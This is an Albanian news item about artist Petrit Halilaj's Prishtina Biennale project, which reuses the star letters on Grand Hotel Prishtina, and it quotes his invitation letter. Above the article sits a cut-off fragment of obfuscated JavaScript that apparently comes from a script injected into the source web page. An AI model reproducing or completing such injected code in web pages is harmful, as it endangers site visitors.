;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Petrit Halilaj na fton t’i bashkohemi në pikturimin e qiellit të Prishtinës me yje

By

Petrit Halilaj është fort i gëzuar që po rikthehet në Prishtinë me një projekt artistik për Bienalen.

Ai fton të gjithë që t’i bashkohën projektit të tij shumë domëthënës.

“Jam fort i gëzuar me u kthy në Prishtinë me një projekt të ri! Kur dielli të ikë do ta pikturojmë qiellin do të jetë një gjithësi, të cilën ju ftoj ta pikturojmë dhe ndriçojmë bashkë më 22 korrik. Puna do të fillojë me shkronjat në maje të Grand Hotel Prishtina, me yjet e tij— të cilat tash për tash janë të shkapërderdhura në kulm të kësaj ndërtese dhe të cilat do të rimontohen, shumohen dhe të shpërndahen nëpër krejt qytetin”, thuhet në ftesën e tij.

Artisti më tej sqaron edhe arsyen pse ai zgjodhi pikërisht hotelin “Grand Hotel”.

“Grand Hoteli është monument historik dhe arkitekturor i qytetit tonë; ai shërben si rikujtim për historinë e Kosovës në ish-Jugosllavi dhe për pasojat e saj. Ai na kujton kohë të errëta, kur është shfrytëzuar nga forca shkatërruese, por gjithashtu pasqyron kohët e reja, të shquara nga një lloj indiference ndaj pikave të rëndësishme të kujtesës kolektive”, shkruan ai ndër të tjerash.

Ai nuk përjashton askënd nga ftesa e tij për këtë projekt që do të vendosë Kosovën edhe më tej në hartë.

“Kjo letër është ftesë për të gjithë Ju. Një ftesë që t’i vendosni yjet nëpër hapësirat tuaja, në ballkone, në dhoma, në dritare a në oborre. Dua t’ju pyes: a mund t’i rikthejmë yjet në mënyrë që të rimarrim hapësirën tonë — një hapësirë që veç është aty, por tek e cila mund të shikojmë përsëri me guximin që të krijojmë një tregim të ri, që ta rrëfejmë këtu dhe tash?”.

Klikoni KËTU për të lexuar të plotë letrën e Petrit Halilajt. /Prive.al

Artikuj të ngjashëm